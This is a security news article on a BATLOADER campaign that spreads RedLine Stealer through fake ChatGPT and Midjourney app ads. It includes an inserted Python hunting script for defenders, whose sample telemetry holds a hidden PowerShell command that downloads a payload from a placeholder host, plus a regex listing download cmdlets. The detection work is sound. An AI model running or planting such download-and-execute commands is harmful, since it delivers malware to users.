
Looking for an AI Tool? Beware of Rogue Sites Distributing RedLine Malware
Malicious Google Search Ads for generative AI services such as OpenAI ChatGPT and Midjourney are being used to redirect users to bogus websites as part of a BATLOADER campaign designed to deliver the RedLine Stealer malware.
“Both AI services are very popular but lack first-party standalone applications (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord),” eSentire said in an analysis.
“This gap has been exploited by threat actors looking to redirect AI app finders to bogus web pages promoting bogus apps.”
BATLOADER is a loader malware that spreads via drive-by downloads: users who search for certain keywords in search engines are shown fake advertisements that, when clicked, redirect them to a malicious landing page hosting the malware.
The installer file, per eSentire, comes with an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server.
After installation completes, the binary uses Microsoft Edge WebView2 to load chat.openai(.)com or www.midjourney(.)com – the legitimate ChatGPT and Midjourney sites – in a pop-up window so as not to raise suspicion.
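As an added illustration (not eSentire's or this article's own material), the Python sketch below shows how a SOC could hunt for the chain described above in process-creation telemetry: an AI-themed executable (ChatGPT.exe or midjourney.exe) spawning PowerShell with one of the named scripts (Chat.ps1, Chat-Ready.ps1) or with a download cmdlet. The sample events, file paths, user name and URL are constructed for the example; the field layout is assumed to mirror Sysmon Event ID 1 style process telemetry, and the ancestor walk guards against missing parents and cyclic parent IDs so a malformed log cannot hang the hunt.

```python
"""Heuristic hunt for the BATLOADER/RedLine chain: AI-lure EXE -> PowerShell
-> lure script or remote download. Sample data below is constructed."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events (assumption: Sysmon Event ID 1 style
# fields). None of this is real telemetry; paths and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # the fake "ChatGPT app" installer's dropped executable
    ProcEvent(200, 100, r"C:\Users\u\AppData\Local\Temp\ChatGPT.exe", "ChatGPT.exe"),
    # it runs the bundled lure script
    ProcEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\u\AppData\Local\Temp\Chat.ps1"'),
    # the script fetches the stealer from a remote host (hostname is a placeholder)
    ProcEvent(202, 201, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri http://example.invalid/rl.bin -OutFile $env:TEMP\rl.exe"'),
    # benign: an admin running a script from the desktop, no AI-lure parent
    ProcEvent(300, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    # benign lookalike: real Midjourney use goes through Discord, not a dropped EXE
    ProcEvent(400, 100, r"C:\Program Files\Discord\Discord.exe", "Discord.exe"),
]

# Names taken from the campaign description; keep them lower-case for matching.
AI_LURE_IMAGES = {"chatgpt.exe", "midjourney.exe"}
LURE_SCRIPTS = re.compile(r"\bchat(-ready)?\.ps1\b", re.I)
DOWNLOAD_CMDLETS = re.compile(
    r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


def _basename(image: str) -> str:
    # ntpath handles Windows paths regardless of the host OS running the hunt.
    return ntpath.basename(image).lower()


def _ancestors(ev: ProcEvent, by_pid: dict):
    """Walk parent links; tolerate a missing root and break on PID reuse cycles."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def find_ai_lure_chains(events):
    """Return PowerShell processes descended from an AI-lure EXE that also show
    a lure script or a remote download in their command line."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if _basename(ev.image) not in SHELLS:
            continue
        reasons = []
        lure_parent = next(
            (a for a in _ancestors(ev, by_pid) if _basename(a.image) in AI_LURE_IMAGES), None)
        if lure_parent is not None:
            reasons.append(f"ancestor={_basename(lure_parent.image)}")
        if LURE_SCRIPTS.search(ev.cmdline):
            reasons.append("lure_script")
        if DOWNLOAD_CMDLETS.search(ev.cmdline):
            reasons.append("remote_download")
        # Require the lure ancestor plus at least one behavioural indicator so
        # ordinary administrative PowerShell does not flood the alert queue.
        if lure_parent is not None and len(reasons) >= 2:
            findings.append({"pid": ev.pid, "reasons": reasons, "cmdline": ev.cmdline})
    return findings


if __name__ == "__main__":
    for f in find_ai_lure_chains(SAMPLE_EVENTS):
        print(f"pid={f['pid']} reasons={','.join(f['reasons'])} cmd={f['cmdline']}")
```

Requiring the lure ancestor plus a second indicator is a deliberate trade-off: the named scripts and executables are trivially renamed by the operator, while "unknown EXE in %TEMP% spawns PowerShell that downloads a file" survives a rename, so in production the ancestor check would be widened to any unsigned binary in a user-writable directory.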

Adversaries’ use of ChatGPT- and Midjourney-themed baits to display malicious ads and ultimately deliver the RedLine Stealer malware was also highlighted last week by Trend Micro.

This is not the first time the operator behind BATLOADER has exploited the surge of interest in AI to distribute malware. In March 2023, eSentire detailed a series of similar attacks that used ChatGPT-themed lures to deploy Vidar Stealer and Ursnif.
The cybersecurity firm further pointed out that abuse of Google Search ads has fallen from its peak in early 2023, indicating that the tech giant is taking active steps to limit its exploitation.
The finding comes a few weeks after Securonix uncovered a phishing campaign dubbed OCX#HARVESTER that targeted the cryptocurrency sector between December 2022 and March 2023 with More_eggs (aka Golden Chickens), a JavaScript downloader used to serve additional payloads.
eSentire, in January, traced the identity of one of the main operators of the Golden Chickens malware-as-a-service (MaaS) to an individual located in Montreal, Canada. A second threat actor associated with the group has been identified as a Romanian citizen who uses the alias Jack.